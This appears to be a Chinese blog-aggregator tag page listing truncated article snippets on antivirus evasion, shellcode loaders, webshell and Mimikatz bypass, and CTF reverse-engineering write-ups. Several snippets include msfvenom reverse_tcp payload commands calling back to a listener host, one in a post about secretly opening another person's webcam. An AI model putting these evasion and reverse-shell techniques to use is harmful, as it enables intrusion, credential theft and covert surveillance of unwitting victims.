免杀_花指令

BUUCTF reverse wp 51 - 55

findKeyshift+f12找到一个flag{}字符串,定位到关键函数,F5无效,大概率是有花指令,读一下汇编这里连续push两个byte_428C54很奇怪,nop掉下面那个,再往上找到函数入口,
fa1c4·2023-10-01 05:50

网络安全(黑客)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-30 15:08

网络安全(黑客技术)自学

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-30 15:38

BUUCTF reverse wp 31 - 40

[HDCTF2019]Maze脱壳,IDA打开,发现无法F5,而且反汇编失败这种情况一般是花指令,误导了IDA的递归反汇编,这里E8是call指令,nop掉按p设置main函数入口再F5即可int__cdeclmain
fa1c4·2023-09-30 06:54

易语言特征码的应用

ctrl+b把特征码(比如ff55fc5f5e)粘贴进去搜到testedx,3往上面看有没有上面三句,有就是易语言的特征码按钮事件:易语言控件消息派发函数易语言的字符比较永远是这样,除非他加了VM,我加花指令让他全是
Tandy12356_·2023-09-30 04:28

【红队攻防】从零开始的木马免杀到上线

0、环境配置说明应该全部使用云服务器完整演示比较好,奈何太穷了买不起服务器,只能用本地环境演示。所需环境如下:系统环境:CentOS7,Windows10软件环境CobaltStrike4.7,ShellQMaker,360杀毒一、CobaltStrike环境配置CentOS7.8环境安装CobaltStrike必备工具安装yum-yinstalllrzsz,unzip上传文件解压然后切换至Cob
为赋新词强说愁·2023-09-30 03:35

免杀对抗-Nim语言免杀-加载工具+加载方式

Nim语言-加载工具-NimShellCodeLoader项目配置环境:1.下载Nim语言&配置bin目录环境变量链接:https://nim-lang.org/install_windows.html配置环境变量2.下载mingw链接:https://nim-lang.org/download/mingw64.7z配置bin目录环境变量3.下载git,配置bin目录环境变量链接:https://
xiaoheizi安全·2023-09-29 23:40

【安全研究】Linux后渗透常见后门驻留方式分析

又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(免杀肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
安全狗(safedog)·2023-09-29 07:55

免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写

无文件落地&分离拆分无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。
xiaoheizi安全·2023-09-27 10:52

免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4

内存加载-UUID地址-ShellCode转换介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。演示语言:c++1.使用以下代码将c语言的shellcode转换为uuid类型代码:uuid.pyimportuuidimportbinasciibuf=b"生成的shellcode"hex=bina
xiaoheizi安全·2023-09-27 10:16

免杀技术,你需要学习哪些内容

免杀技术,你需要学习哪些内容?什么是免杀免杀是指通过各种技术手段使恶意软件或病毒能够逃避杀毒软件的检测和阻止,成功地感染目标系统。
自饰者六便士·2023-09-26 17:21

认识JSP webshell免杀

【virustotal】【D盾】【shellpub】接下来进行免杀免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
凌木LSJ·2023-09-25 15:32

WAF Bypass及案例实战

1.2.1WAF指纹识别工具1.3绕WAF的多种方式2.SQLiBypass2.1Bypass思路2.1.1层面问题2.1.2HTTP问题2.2绕过分析2.2.1绕过方式2.2.2脚本编写3.一句话木马免杀
来日可期x·2023-09-25 03:20

免杀对抗-java语言-shellcode免杀-源码修改+打包exe

JAVA-ShellCode免杀-源码修改&打包EXEShellcode-生成/上线1.msf生成shellcode命令:msfvenom-pjava/meterpreter/reverse_tcpLHOST
xiaoheizi安全·2023-09-24 15:34

免杀对抗-PowerShell-混淆+分离

演示:PowerShell-生成和上线1.生成——启动cs,生成两种模式的powershell脚本文件模式:执行ps1文件上线命令模式:执行txt文件中的命令上线2.文件模式powershell执行——两种方法方法一:打开Win7以上自带的WindowsPowerShellISE来执行成功上线:方法二:打开命令行,启动PowerShell来执行命令:powershell命令:.\payload.p
xiaoheizi安全·2023-09-24 15:04

免杀对抗-C#+go语言-混淆+防反编译+分离

C#&NET-ShellCode-生成/上线一、生成:1.msf生成C#语言的shellcode命令:msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.206.192LPORT=4444-ex86/shikata_ga_nai-i15-fcsharp二、上线:1.c#语言shellcode加载代码:usingSystem;usin
xiaoheizi安全·2023-09-24 15:03

CS 4.7 Stager 逆向及 Shellcode 重写

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,
小袁同学爱学习·2023-09-24 07:02

Rust免杀 Shellcode加载与混淆2

前言这是半年前我学习Rust和免杀时的一些记录,最近打开知识库看到了这篇半年前的笔记,并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子,于是想着将这篇笔记分享出来供大家参考和指正。
小袁同学爱学习·2023-09-24 06:23

网络安全(黑客技术)学习笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-20 11:47

木马免杀之PE文件

对于此问题,打算开一个专题进行木马免杀的分析,先从最最重要的PE文件说起,要攻击Windows系统,如果不懂PE文件,面对杀毒软件,则只能束手就擒了。PE文件PE(PortableExec
无情剑客Burning·2023-09-20 03:40

打开对方的电脑的摄像头

大家玩玩就好,有杀毒软件可能会被干掉,关于免杀方式有很多,请勿捉弄同学,谢谢msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT
落幕_f94c·2023-09-19 14:39

Windows多种方式获取密码

后面一段时间直到hw结束,我打算把主要精力都放在免杀上面,不会点C真的寸步难行,或者就只能从go下手了0x01SSP记录明文密码SSP(SecuritySupportProvider)是一个用于实现身份验证的
book4yi·2023-09-19 08:11

免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

Python-MSF/CS生成shellcode-上线cs上线1.生成shellcode-c或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode执行代码:importctypesfromdjango.contrib.gisimportptr#cs#shellcode=bytearray(b"生成的shellcode")#msf的shellcode
xiaoheizi安全·2023-09-18 00:25

PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描

PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW漏洞扫描。
代码讲故事·2023-09-16 18:17

ProcDump+Mimikatz绕过杀毒软件抓密码

Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者免杀难度会比较大,那有办法去解决这个问题吗?
Xuno_·2023-09-13 02:33

内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)

欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注(mimikatz、pwdump/procdump/LaZagne/nmap)很紧张很“充实”的培训
热热的雨夜·2023-09-13 02:31

几种姿势运行mimikatz

但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。
小晓晓晓林·2023-09-13 02:29

免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

C/C++--ShellCode-免杀对抗介绍:shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。
xiaoheizi安全·2023-09-11 10:48

记一次内网实战之不会免杀(上)

本文作者:重生信安-nobgr前段时间看了一下内网渗透,所以想找个环境练习一下,恰好有个兄弟丢了个站点出来,一起“练习内网”,然后就开始了“实战代练”。由于“懒”,所以记录时间和截图有些是补的。0x00外网入口点打开站点(这里用baidu.com替代)看了看,左翻翻右翻翻能看到很明显的“注入”点。简单测试一下(and1=1、1=2),返回不一样,所以sqlmap一把梭。sqlmap-uhttps:
重生信息安全·2023-09-10 15:24

Flash钓鱼->CS上线(免杀过火绒、360等)

先看结果访问钓鱼页面:点击立即升级即把马儿下载下来了这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了双击运行,查看效果:首先CS是没东西的解压路径现在也是没东西的(这里我把解压路径给改成了:C:\Windows\Temp执行路径为:C:\Windows\Temp\Flash.exe)双击砸门的flash文件马尔已上线--------------
鸡肋是鸡肋!·2023-09-10 08:04

Python绝技:运用Python成为顶级黑客

Python绝技:运用Python成为顶级黑客结合具体的场景和真实的案例,详述了Python在渗透测试、电子取证、网络流量分析、无线安全、网站中信息的自动抓取、病毒免杀等领域内所发挥的巨大作用。
『六道』·2023-09-09 22:28

一款内网信息收集利用工具

FuckDomainMini简介这是一款基于java开发Windows的内网信息收集、利用工具可以节省您的信息收集所花费的,又或者是做免杀所花费的时间现在这个版本是先行版本,目前先行版只有一个功能,更多的功能还在调试与开发中
HACK之道·2023-09-09 17:40

Python 源码混淆与加密

但在某些场景下,我们的源码是不想被别人看到的,例如开发商业软件、编写0day漏洞POC/EXP、免杀shellcode等。多人学习python,不知道从何学起。
早起的python·2023-09-08 20:48

蓝队追踪者工具TrackAttacker,以及免杀马生成工具

蓝队追踪者工具TrackAttacker,以及免杀马生成工具。做过防守的都知道大HW时的攻击IP量,那么对于这些攻击IP若一个个去溯源则显得效率低下,如果有个工具可以对这些IP做批量初筛是不是更好?
代码讲故事·2023-09-03 19:02

1.9 动态解密ShellCode反弹

利用动态解密执行技术可以实现免杀。当程序中使用了敏感的函数时,存在被杀的风险。通过将代码段中的代码进行加密,在需要时直
微软技术分享·2023-09-01 23:24

mimikatz免杀过360和火绒

1、免杀方式对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上
zxl2605·2023-08-30 23:50

网络安全(黑客技术)学习手册

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-08-29 12:11

Certutil工具(Windows命令行下载常用)

其功能可校验文件MD5,SHA1,SHA256,下载恶意文件和免杀CertutilCertutil是一个CLI程序,可用于转储和显示证书颁发机构(CA),配置信息,证书服务,CA组件的备份和还原以及验
番茄酱料·2023-08-29 09:14

ConsoleApplication818项目免杀(CreateThreadpoolWait+VEH Hook Load)

#include#include#include#include#include"detours.h"#include"detver.h"#pragmacomment(lib,"detours.lib")#pragmacomment(lib,"wininet")#pragmacomment(linker,"/subsystem:\"Windows\"/entry:\"mainCRTStartup\
番茄酱料·2023-08-29 09:42

ConsoleApplication17_2项目免杀(Fiber+VEH Hook Load)

加载方式Fiber+VEHHookLoadFiber是纤程免杀,VEH是异常报错,hook使用detours来hookVirtualAlloc和sleep,通过异常报错调用实现主动hook纤程Fiber
番茄酱料·2023-08-29 08:35

免杀学习(1)

正常来说对服务器上传木马时,都会考虑一个问题,就是绕过杀毒软件的问题,也就是免杀问题0x01涉及技术shellcode混淆加密,无文件落地,分离拆分,白名单,DLL加载,Syscall,加壳加花,资源修改
mushangqiujin·2023-08-29 02:03

网络安全—黑客技术(学习笔记)

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-08-27 18:52

webshell免杀

免杀之回调函数加组合绕过array_walkarray_mapfilter_varfilter_var_arrayuasortuksort以上是常见的可待替代函数,但是大部分都被杀的死死的,所以需要混淆才可以使用
『小杰』·2023-08-27 17:15

Windows逆向项目-LoadPE

Windows逆向项目-LoadPE这是PE阶段时,老师布置的作业:[写一个LordPE];木马,免杀,病毒等等都需要对PE结构有足够的了解PE结构详细图:项目介绍:项目使用C++,MFC开发功能:显示进程和模块将文件映像到内存显示
依星net188.com·2023-08-26 13:54

php_webshell免杀--从0改造你的AntSword

0x00前言:为什么会有改造蚁剑的想法,之前看到有做冰蝎的流量加密,来看到绕过waf,改造一些弱特征,通过流量转换,跳过密钥交互。但是,冰蝎需要反编译去改造源码,再进行修复bug,也比较复杂。而AntSword相对于冰蝎来说,不限制webshell,即一句话也可以进行连接,还可以自定义编码器和解码器,可以很容易让流量做到混淆。0x01蚁剑介绍及其改编:关于蚁剑的介绍,这里就不多说了,一个连接web
红队蓝军·2023-08-26 06:50

Metasploit渗透测试1

目录术语介绍:渗透测试流程:漏洞:渗透测试:权限提升:免杀:攻击载荷:后渗透:攻击利用:术语介绍:术语漏洞Vulnerability渗透测试PenatrationTest权限提升PrivilegeEscalation
吉米_·2023-08-26 02:03

网络安全(黑客)自学笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-08-25 07:35

Hook免杀实战: 去除杀软的三环钩子

Hook的概念什么是HookHook(也被称为“挂钩子”)是一种程序设计模式,它提供了一种方式去截获(或者“挂钩子”在)系统级别或者应用级别的函数调用、消息、事件等。通过使用Hook,开发者可以在不修改源程序的情况下,改变或者扩展操作系统、应用程序、驱动程序的功能Hook的分类Hook通常分为两种形式,分别是修改函数代码和修改函数地址修改函数代码InlineHook:InlineHook即内联Ho
Henry404s·2023-08-23 02:33

Mimikatz免杀实战:绕过360核晶和defender

文章目录前言绕过360核晶实现思路完整代码运行测试绕过WD实现思路MiniDumpWriteDump回调函数加密dump文件完整代码运行测试参考文章前言通常来说,即使我们成功实现了mimikatz的静态免杀
Henry404s·2023-08-23 02:32

特征码免杀MYCCL应用实验

一、实验目的:1)掌握MYCCL特征码定位器2)掌握用MYCCL定位病毒特征码,及改写之达到免杀目的二、预备知识:1.特征码:就是病毒代码中的某一段特定的字符串或者二进制串2.免杀的方法:修改入口点、或者加壳加花伪装
诚威_lol_中大努力中·2023-08-22 17:45
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他